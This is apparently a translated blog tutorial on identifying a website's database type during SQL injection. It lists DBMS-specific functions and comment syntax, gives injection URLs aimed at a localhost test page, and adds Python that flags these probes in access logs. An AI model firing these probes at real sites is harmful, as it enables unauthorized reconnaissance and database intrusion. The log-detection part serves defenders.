How to determine the database type in SQL injection

Preface

Before performing SQL injection, you should first determine the type of database. Different databases differ subtly in how they handle certain functions. Only once the database type is known can you choose the appropriate functions for that database, which makes the SQL injection easy to carry out.

Front end and database type

asp: SQL Server, Access
.net: SQL Server
php: MySQL, PostgreSQL
java: Oracle, MySQL

Judging by port

Oracle : default port 1521
SQL Server : default port 1433
MySQL : default port 3306

Judging by database-specific functions

len and length

len(): the length function in SQL Server, MySQL and DB2.
length(): the length function in Oracle and Informix.

version and @@version

version(): queries version information in MySQL
@@version: queries version information in MySQL and SQL Server

substring and substr

MySQL can use both functions
Oracle can only call substr
SQL Server can only call substring

Judging by special symbols

/* is a comment character in MySQL.
-- is a comment character supported by Oracle and SQL Server.
; is the query clause separator. Oracle does not support multi-line queries, so if an error is returned, the database is Oracle.
# is a comment character in MySQL. If an error is returned, the database may not be MySQL. MySQL also supports -- and /**/.

Judging according to the way the database handles the string

  1. MySQL
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab'
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
  2. Oracle
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab'
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
  3. SQL Server
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab'

Judging according to the specific data table of the database

  1. MySQL (version > 5.0)
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1
  2. Oracle
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1
  3. SQL Server
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1
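
The probes in the sections above leave recognizable strings in web server access logs. The following Python is an added example, not part of the original post: it scans log lines for those probe strings and reports which clients tested for more than one DBMS. The log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

WS = r"[\s+]*"  # whitespace, or '+' left over from form-encoded spaces
LIT = r"'\w*'"  # a short quoted string literal such as 'a'

# (DBMS the probe targets, pattern). Patterns mirror the probes on this page.
SIGNATURES = [
    ("MySQL", re.compile(r"information_schema\.tables", re.I)),
    ("Oracle", re.compile(r"sys\.user_tables", re.I)),
    ("SQL Server", re.compile(r"\bsysobjects\b", re.I)),
    ("Oracle", re.compile(LIT + WS + r"\|\|" + WS + LIT + WS + "=" + WS + LIT)),
    ("MySQL/Oracle", re.compile(r"concat\(" + LIT + "," + LIT + r"\)" + WS + "=", re.I)),
    ("MySQL/SQL Server", re.compile(LIT + WS + r"\+" + WS + LIT + WS + "=" + WS + LIT)),
    ("MySQL/SQL Server", re.compile(r"@@version", re.I)),
]
# Assumed log format: client address first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def fingerprint_probes(log_lines):
    """Map client IP -> set of DBMS labels its requests probed for."""
    hits = defaultdict(set)
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.group(1), unquote(m.group(2))  # decode %xx first
        for dbms, pattern in SIGNATURES:
            if pattern.search(target):
                hits[client].add(dbms)
    return dict(hits)

def likely_fingerprinting(hits, threshold=2):
    """Clients whose requests carried probes for several DBMS labels."""
    return sorted(ip for ip, seen in hits.items() if len(seen) >= threshold)

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2021:10:00:01 +0000] "GET /test.php?id=1%20and%20'a'%7C%7C'b'='ab' HTTP/1.1" 200 512
203.0.113.7 - - [01/Apr/2021:10:00:02 +0000] "GET /test.php?id=1%20and%20(select%20count(*)%20from%20sysobjects)>0%20and%201=1 HTTP/1.1" 500 0
203.0.113.7 - - [01/Apr/2021:10:00:03 +0000] "GET /test.php?id=1+and+CONCAT('a','b')='ab' HTTP/1.1" 200 512
198.51.100.20 - - [01/Apr/2021:10:00:04 +0000] "GET /test.php?id=1 HTTP/1.1" 200 512
198.51.100.31 - - [01/Apr/2021:10:00:05 +0000] "GET /search.php?q=information_schema.tables+tutorial HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    print(likely_fingerprinting(fingerprint_probes(SAMPLE_LOG)))
```

A single match, such as the search for a tutorial in the last sample line, is not flagged; the threshold of two labels separates back-end enumeration from ordinary requests that happen to mention a table name.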


Origin blog.csdn.net/weixin_43749601/article/details/115369123